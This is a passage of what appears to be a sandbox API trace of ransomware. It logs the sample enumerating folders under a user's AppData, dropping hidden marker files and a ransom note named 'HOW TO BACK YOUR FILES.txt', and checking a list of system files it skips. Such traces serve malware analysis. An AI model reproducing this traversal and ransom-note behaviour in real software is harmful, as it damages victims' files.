lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef2c001e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef2c001e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.497] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.497] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.497] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef2c001e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef2c001e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.497] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0063.497] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.498] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.498] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.498] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.498] CloseHandle (hObject=0x278) returned 1 [0063.498] CloseHandle (hObject=0x298) returned 1 [0063.498] GetCurrentThreadId () returned 0xd98 [0063.498] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0063.499] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies" [0063.499] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123500 | out: hHeap=0xe0000) returned 1 [0063.499] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0063.499] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies" [0063.499] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\" [0063.499] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0063.499] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.500] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.502] FlushFileBuffers (hFile=0x298) returned 1 [0063.503] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.503] CloseHandle (hObject=0x298) returned 1 [0063.504] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies") returned 89 [0063.504] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.504] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab3f21, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.504] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.504] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.504] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.504] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.504] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab3f21, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.504] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.504] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.504] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.504] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.504] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.504] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef2c001e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef2c001e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.504] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.505] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.505] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef2c001e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef2c001e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.505] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.505] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.505] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.505] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.505] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.506] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.506] CloseHandle (hObject=0x278) returned 1 [0063.506] CloseHandle (hObject=0x298) returned 1 [0063.506] GetCurrentThreadId () returned 0xd98 [0063.506] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0063.506] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache" [0063.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124478 | out: hHeap=0xe0000) returned 1 [0063.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0063.506] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache" [0063.506] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\" [0063.506] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0063.506] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.507] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.510] FlushFileBuffers (hFile=0x298) returned 1 [0063.511] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.511] CloseHandle (hObject=0x298) returned 1 [0063.511] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache") returned 87 [0063.511] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.511] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab3531, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0063.512] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.512] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.512] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.512] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.512] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab3531, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.512] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.512] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.512] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.512] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.512] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.512] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef2c001e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef2c001e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef2e651a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.512] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.512] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.512] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef2c001e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef2c001e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef2e651a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.512] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0063.512] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.512] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.513] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.513] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.513] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.513] CloseHandle (hObject=0x278) returned 1 [0063.514] CloseHandle (hObject=0x298) returned 1 [0063.514] GetCurrentThreadId () returned 0xd98 [0063.514] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0063.514] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe" [0063.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118028 | out: hHeap=0xe0000) returned 1 [0063.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0063.514] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe" [0063.514] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\" [0063.514] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0063.514] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.517] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.519] FlushFileBuffers (hFile=0x298) returned 1 [0063.520] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.520] CloseHandle (hObject=0x298) returned 1 [0063.521] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe") returned 81 [0063.521] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.521] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed548e8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbede9823, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef2e651a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.521] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.521] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.521] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.521] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.521] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed548e8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbede9823, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef2e651a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.521] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.521] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.521] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.521] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.521] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.521] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef2e651a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef2e651a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef2e651a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.521] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.521] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.521] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbede9823, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedef9f4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbedef9f4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0063.521] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.521] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.521] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0063.521] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0063.521] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0063.521] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0063.521] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0063.522] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0063.522] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0063.522] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0063.522] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0063.522] lstrcpyW (in: lpString1=0x130ebdc, lpString2="AC" | out: lpString1="AC") returned="AC" [0063.522] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0063.522] 